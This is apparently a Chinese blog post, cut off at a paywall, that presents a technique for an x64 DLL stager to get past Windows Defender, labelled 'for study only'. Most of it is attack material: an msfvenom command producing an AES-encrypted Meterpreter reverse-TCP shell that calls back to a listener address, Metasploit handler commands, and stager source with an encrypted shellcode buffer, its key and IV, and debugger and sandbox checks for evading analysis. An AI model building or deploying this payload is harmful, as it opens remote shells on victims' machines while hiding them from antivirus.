x64 dll免杀2022-11-20能过defender
仅做学习记录
项目地址:https://github.com/phackt/stager.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 EXIT_FUNC=PROCESS LHOST=192.168.3.4 LPORT=4433 SessionRetryTotal=60 RC4PASSWORD=KliikBjsjwl221 --encrypt aes256 --encrypt-iv A1a0eCXCCB0YzS4j --encrypt-key 1ASMkFxcyhwXehNZw048ca11h1BCzyyR -f c
msf6 >use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp_rc4
payload => windows/x64/meterpreter/reverse_tcp_rc4
msf6 exploit(multi/handler) > set lhost 192.168.3.4
lhost => 192.168.3.4
msf6 exploit(multi/handler) > set lport 4433
lport => 4433
msf6 exploit(multi/handler) > set rc4password KliikBjsjwl221
rc4password => KliikBjsjwl221
源文件 stager.cpp
#define CBC 1
#include "aes.h"
#include <Windows.h>
#include <Wininet.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <iostream>
#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Wininet.lib")
using namespace std;
#define PAYLOADLENGTH 650
#define IV "A1a0eCXCCB0YzS4j"
#define KEY "1ASMkFxcyhwXehNZw048ca11h1BCzyyR"
#define CLASSNAME "111111"
#define WINDOWTITLE "11111"
unsigned char buf[] =
"\x1e\xdf\x46\x01\x61\xcf\x72\x3b\xba\xf3\xa6\x72\x46\x47\x82"
"\xdd\x84\x28\x1f\x71\xa7\xfc\x9e\xc6\x42\x04\xc6\x86\xca\xfa"
"\x5e\xad\xca\x7a\x3f\xd1\xee\xdb\xa3\x21\xfb\x75\x2d\x65\x66"
"\x66\x72\x28\x5d\x0d\x3b\xe7\xf6\x3e\xb7\xb6\x20\x24\x72\xd6"
"\x71\x29\xd9\x01\x07\x94\x64\x26\x2a\xff\x39\xa2\xa1\x5b\x81"
"\x35\xdb\x01\x6f\x50\x9d\xa5\x20\x29\x0a\x53\xa3\xe4\xdb\xda"
"\x25\x7c\x71\xa0\xd7\xd9\x96\x08\xa1\x5f\x20\x30\xd8\xc6\x8a"
"\xbe\xc6\xdf\x49\x0d\x94\x16\xb7\x78\x97\x5b\xee\x0f\x89\x00"
"\x2c\x31\x7a\x60\x75\x14\x90\xba\x9a\x1e\xce\x13\x8e\x9e\x93"
"\xf4\x45\x09\x2d\x7e\x88\x3d\xda\x7e\xc1\xc6\xcf\xed\x08\x5d"
"\xb7\x18\xfe\xbf\xa7\x60\xae\xc8\x12\x58\xc1\x25\x9f\x95\x04"
"\x1a\xb5\xb8\xc3\xc5\xa1\x9e\x20\x94\x51\x99\x3f\xeb\x9f\x00"
"\x37\x7c\x17\xa1\xd0\xdd\xbf\xfe\xc9\xbd\x12\x45\x4d\x5e\xe7"
"\xed\x2e\xb3\xe1\x20\x46\xcd\x59\x5e\xcc\xd3\x85\x97\x79\x1d"
"\x22\x75\x6e\x81\x9b\xa8\xc1\xab\xe6\x29\x7d\xf5\x92\x36\x69"
"\x78\x10\x99\x66\xdf\xa8\xd6\x79\x70\xa3\xe9\xbc\x98\xb8\x4e"
"\x60\x4b\xc2\xc7\x36\xbb\x6c\xa6\x79\xff\x5c\x91\x6b\xe8\xc5"
"\xb6\x88\x06\xf8\x4d\x0a\x2d\x9c\x52\xe7\xc0\x98\x0f\x5d\x6e"
"\xf1\x41\x98\x81\xc9\xa3\x98\x19\xd9\x1f\x99\xc8\x8d\x21\xe1"
"\xe0\xcd\x31\x92\x76\xfa\x1f\x3f\xc4\xd2\xef\x13\xbb\x0e\xbe"
"\x8e\x53\x8e\x1a\x7a\xbb\xf8\xd5\xef\xdf\x11\x42\xe1\xde\x4c"
"\xc6\x39\x62\x62\x4c\xf0\xb7\xe6\x40\x1b\x3d\x21\xe4\xb3\xe8"
"\xfb\x87\xe1\xae\xc5\x18\x8e\x1c\x34\x4d\x67\x3d\x04\x24\x82"
"\xa5\xeb\xbf\x78\xbf\x6b\xe7\x10\xda\x83\x54\x90\xe8\x6f\x38"
"\xa1\x13\xbb\xe2\x4a\x99\x0f\x3d\x78\xf1\xd9\x31\xa9\x21\xff"
"\x4d\xae\x07\xaa\x2f\x0b\x8c\xd8\x16\x55\xa5\xcc\xf3\x20\xc6"
"\x99\x6b\x3c\x67\x93\xc1\x10\xeb\x47\xdb\xca\xda\x5d\x9d\xd0"
"\xdd\x6e\xb4\xd9\x2e\x8d\x0f\x82\x07\xb8\xf5\xdd\x72\x83\x37"
"\xbc\x92\x00\x3b\xb8\x0c\xbb\xb7\x26\x07\x95\xc5\xce\xbb\x90"
"\x47\xee\x16\x69\xca\x52\xe8\x38\x04\x58\xb2\x51\x93\xc7\x26"
"\x07\xdc\x83\xba\xee\x47\x77\x95\x4b\x3d\xba\x17\x1a\xcf\x66"
"\x74\x38\x21\x69\x27\x64\xdd\x80\xca\xd5\xa3\xfd\x9a\x00\x25"
"\xdd\x8c\x1e\x98\x49\x0f\xf9\x1b\xbc\x5b\x82\xaf\x06\x67\xb6"
"\xea\xf3\x3c\xcc\xce\x0f\xf2\xbc\x3e\xa3\xf0\x77\x9f\xce\x7a"
"\xf3\x56\x88\x1a\x49\x86\x4c\x32\x8d\x75\xec\x3d\x86\x8e\x15"
"\xed\xb7\xa9\x4c\x08\xf7\x51\x17\x8a\x81\xec\xeb\x8b\x6a\xbe"
"\x78\xe7\xba\x86\x4c\x68\x1a\x50\xf4\x6c\xf8\x3b\x35\x9e\x1b"
"\x16\x9d\x7e\x68\x74\xf9\x05\x39\x3e\xa4\x07\x5c\x94\x68\x6a"
"\xe5\x1e\x7a\x11\x60\xd8\x4e\xc8\xa0\xd8\x12\xf0\x48\x39\xbb"
"\x4b\xb7\xf9\xd4\x07\x56\x76\x0f\x2a\xc5\x06\xa8\x94\xfa\x1b"
"\x9f\xbb\x5a\xe9\xbb\x3f\xc1\xfe\x7d\x40\xdf\x75\x11\x80\xd9"
"\x37\x83\x03\x64\x00\xc2\x82\x9e\x18\xfe\xe6\x56\xaa\x23\xd4"
"\x5a\x54\x92\x0c\xd1\x24\x78\x8f\x8d\x8f\x20\x3a\xd2\x5b\xfb"
"\x0e\x02\xc5\x37\x80\xdf\x78\x4c\x5c\x56\x04";
const int ENCRYPTEDBUFFERLENGTH = sizeof(buf);
namespace Aes256MsfPayload {
class Utils {
public:
static char IsDbgPresent() {
if (IsDebuggerPresent())
{
return 1;
}
return 0;
}
static bool IsSandboxPresent() {
// Non-uniform memory access (NUMA) is a computer memory design used in multiprocessing,
// where the memory access time depends on the memory location relative to the processor.
// https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf
return VirtualAlloc
最低0.47元/天 解锁文章
扫一扫
876
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
